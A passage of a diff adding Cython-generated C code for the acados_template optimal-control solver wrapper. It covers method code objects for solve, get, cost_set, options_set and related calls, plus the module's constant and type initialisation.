94, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__42)) __PYX_ERR(0, 94, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":108 + * + * + * def solve(self): # <<<<<<<<<<<<<< + * """ + * Solve the ocp with current input. + */ + __pyx_codeobj__43 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_solve, 108, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__43)) __PYX_ERR(0, 108, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":115 + * + * + * def reset(self): # <<<<<<<<<<<<<< + * """ + * Sets current iterate to all zeros. + */ + __pyx_codeobj__44 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_reset, 115, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__44)) __PYX_ERR(0, 115, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":122 + * + * + * def set_new_time_steps(self, new_time_steps): # <<<<<<<<<<<<<< + * """ + * Set new time steps. + */ + __pyx_tuple__45 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_new_time_steps); if (unlikely(!__pyx_tuple__45)) __PYX_ERR(0, 122, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__45); + __Pyx_GIVEREF(__pyx_tuple__45); + __pyx_codeobj__46 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__45, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_set_new_time_steps, 122, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__46)) __PYX_ERR(0, 122, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":173 + * + * + * def update_qp_solver_cond_N(self, qp_solver_cond_N: int): # <<<<<<<<<<<<<< + * """ + * Recreate solver with new value `qp_solver_cond_N` with a partial condensing QP solver. + */ + __pyx_tuple__47 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_qp_solver_cond_N); if (unlikely(!__pyx_tuple__47)) __PYX_ERR(0, 173, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__47); + __Pyx_GIVEREF(__pyx_tuple__47); + __pyx_codeobj__48 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__47, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_update_qp_solver_cond_N, 173, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__48)) __PYX_ERR(0, 173, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + __pyx_tuple__49 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_index, __pyx_n_s_stage, __pyx_n_s_field, __pyx_n_s_field_2, __pyx_n_s_nx); if (unlikely(!__pyx_tuple__49)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__49); + __Pyx_GIVEREF(__pyx_tuple__49); + __pyx_codeobj__50 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__49, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_eval_param_sens, 207, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__50)) __PYX_ERR(0, 207, __pyx_L1_error) + __pyx_tuple__51 = PyTuple_Pack(2, __pyx_int_0, __pyx_n_u_ex); if (unlikely(!__pyx_tuple__51)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__51); + __Pyx_GIVEREF(__pyx_tuple__51); + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + __pyx_tuple__52 = PyTuple_Pack(7, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_out_fields, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_out); if (unlikely(!__pyx_tuple__52)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__52); + __Pyx_GIVEREF(__pyx_tuple__52); + __pyx_codeobj__53 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__52, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get, 232, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__53)) __PYX_ERR(0, 232, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + __pyx_codeobj__54 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_print_statistics, 275, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__54)) __PYX_ERR(0, 275, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + __pyx_tuple__55 = PyTuple_Pack(7, __pyx_n_s_self, __pyx_n_s_filename, __pyx_n_s_overwrite, __pyx_n_s_json, __pyx_n_s_solution, __pyx_n_s_i, __pyx_n_s_f); if (unlikely(!__pyx_tuple__55)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__55); + __Pyx_GIVEREF(__pyx_tuple__55); + __pyx_codeobj__56 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__55, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_store_iterate, 293, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__56)) __PYX_ERR(0, 293, __pyx_L1_error) + __pyx_tuple__57 = PyTuple_Pack(2, __pyx_kp_u__14, Py_False); if (unlikely(!__pyx_tuple__57)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__57); + __Pyx_GIVEREF(__pyx_tuple__57); + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + __pyx_tuple__58 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_filename, __pyx_n_s_json, __pyx_n_s_f, __pyx_n_s_solution, __pyx_n_s_key, __pyx_n_s_field, __pyx_n_s_stage); if (unlikely(!__pyx_tuple__58)) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__58); + __Pyx_GIVEREF(__pyx_tuple__58); + __pyx_codeobj__59 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__58, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_load_iterate, 330, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__59)) __PYX_ERR(0, 330, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + __pyx_tuple__60 = PyTuple_Pack(10, __pyx_n_s_self, __pyx_n_s_field_2, __pyx_n_s_double_fields, __pyx_n_s_fields, __pyx_n_s_field, __pyx_n_s_sqp_iter, __pyx_n_s_stat_m, __pyx_n_s_stat_n, __pyx_n_s_min_size, __pyx_n_s_full_stats); if (unlikely(!__pyx_tuple__60)) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__60); + __Pyx_GIVEREF(__pyx_tuple__60); + __pyx_codeobj__61 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__60, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stats, 346, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__61)) __PYX_ERR(0, 346, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + __pyx_tuple__62 = PyTuple_Pack(3, __pyx_n_s_self, __pyx_n_s_field, __pyx_n_s_out); if (unlikely(!__pyx_tuple__62)) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__62); + __Pyx_GIVEREF(__pyx_tuple__62); + __pyx_codeobj__63 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__62, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_int, 428, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__63)) __PYX_ERR(0, 428, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + __pyx_codeobj__64 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__62, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_double, 433, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__64)) __PYX_ERR(0, 433, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + __pyx_tuple__65 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_field, __pyx_n_s_n, __pyx_n_s_m, __pyx_n_s_out_mat); if (unlikely(!__pyx_tuple__65)) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__65); + __Pyx_GIVEREF(__pyx_tuple__65); + __pyx_codeobj__66 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__65, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_stat_matrix, 438, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__66)) __PYX_ERR(0, 438, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + __pyx_tuple__67 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_out); if (unlikely(!__pyx_tuple__67)) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__67); + __Pyx_GIVEREF(__pyx_tuple__67); + __pyx_codeobj__68 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__67, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_cost, 444, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__68)) __PYX_ERR(0, 444, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + __pyx_tuple__69 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_recompute, __pyx_n_s_out, __pyx_n_s_double_value, __pyx_n_s_field); if (unlikely(!__pyx_tuple__69)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__69); + __Pyx_GIVEREF(__pyx_tuple__69); + __pyx_codeobj__70 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__69, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_residuals, 460, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__70)) __PYX_ERR(0, 460, __pyx_L1_error) + __pyx_tuple__71 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__71)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__71); + __Pyx_GIVEREF(__pyx_tuple__71); + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + __pyx_tuple__72 = PyTuple_Pack(12, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_cost_fields, __pyx_n_s_constraints_fields, __pyx_n_s_out_fields, __pyx_n_s_mem_fields, __pyx_n_s_field, __pyx_n_s_value_2, __pyx_n_s_dims, __pyx_n_s_msg); if (unlikely(!__pyx_tuple__72)) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__72); + __Pyx_GIVEREF(__pyx_tuple__72); + __pyx_codeobj__73 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 12, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__72, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_set, 492, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__73)) __PYX_ERR(0, 492, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + __pyx_tuple__74 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_value_2, __pyx_n_s_value_shape); if (unlikely(!__pyx_tuple__74)) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__74); + __Pyx_GIVEREF(__pyx_tuple__74); + __pyx_codeobj__75 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__74, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_cost_set, 551, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__75)) __PYX_ERR(0, 551, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + __pyx_codeobj__76 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__74, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_constraints_set, 584, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__76)) __PYX_ERR(0, 584, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + __pyx_tuple__77 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_out); if (unlikely(!__pyx_tuple__77)) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__77); + __Pyx_GIVEREF(__pyx_tuple__77); + __pyx_codeobj__78 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__77, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_dynamics_get, 619, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__78)) __PYX_ERR(0, 619, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + __pyx_tuple__79 = PyTuple_Pack(10, __pyx_n_s_self, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_int_fields, __pyx_n_s_double_fields, __pyx_n_s_string_fields, __pyx_n_s_field, __pyx_n_s_int_value, __pyx_n_s_double_value, __pyx_n_s_string_value); if (unlikely(!__pyx_tuple__79)) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__79); + __Pyx_GIVEREF(__pyx_tuple__79); + __pyx_codeobj__80 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__79, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_options_set, 641, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__80)) __PYX_ERR(0, 641, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__81 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__81)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_tuple__82 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__82)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__82); + __Pyx_GIVEREF(__pyx_tuple__82); + __pyx_codeobj__83 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__82, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__83)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_2 = PyInt_FromLong(2); if (unlikely(!__pyx_int_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_4 = PyInt_FromLong(4); if (unlikely(!__pyx_int_4)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_6 = PyInt_FromLong(6); if (unlikely(!__pyx_int_6)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_7 = PyInt_FromLong(7); if (unlikely(!__pyx_int_7)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_112105877 = PyInt_FromLong(112105877L); if (unlikely(!__pyx_int_112105877)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_136983863 = PyInt_FromLong(136983863L); if (unlikely(!__pyx_int_136983863)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_184977713 = PyInt_FromLong(184977713L); if (unlikely(!__pyx_int_184977713)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_5 = PyInt_FromLong(-5); if (unlikely(!__pyx_int_neg_5)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + /* AssertionsEnabled.init */ + __Pyx_init_assertions_enabled(); + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + /* NumpyImportArray.init */ + /* + * Cython has automatically inserted a call to _import_array since + * you didn't include one when you cimported numpy. To disable this + * add the line + * numpy._import_array + */ +#ifdef NPY_FEATURE_VERSION +#if !NO_IMPORT_ARRAY +if (unlikely(_import_array() == -1)) { + PyErr_SetString(PyExc_ImportError, "numpy.core.multiarray failed to import " + "(auto-generated because you didn't call 'numpy.import_array()' after cimporting numpy; " + "use 'numpy._import_array' to disable if you are certain you don't need it)."); +} +#endif +#endif + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __pyx_collections_abc_Sequence = Py_None; Py_INCREF(Py_None); + generic = Py_None; Py_INCREF(Py_None); + strided = Py_None; Py_INCREF(Py_None); + indirect = Py_None; Py_INCREF(Py_None); + contiguous = Py_None; Py_INCREF(Py_None); + indirect_contiguous = Py_None; Py_INCREF(Py_None); + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec, NULL); if (unlikely(!__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython)) __PYX_ERR(0, 52, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec, __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #else + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = &__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dictoffset && __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_AcadosOcpSolverCython, (PyObject *) __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #endif + __pyx_vtabptr_array = &__pyx_vtable_array; + __pyx_vtable_array.get_memview = (PyObject *(*)(struct __pyx_array_obj *))__pyx_array_get_memview; + #if CYTHON_USE_TYPE_SPECS + __pyx_array_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_array_spec, NULL); if (unlikely(!__pyx_array_type)) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_array_type->tp_as_buffer = &__pyx_tp_as_buffer_array; + if (!__pyx_array_type->tp_as_buffer->bf_releasebuffer && __pyx_array_type->tp_base->tp_as_buffer 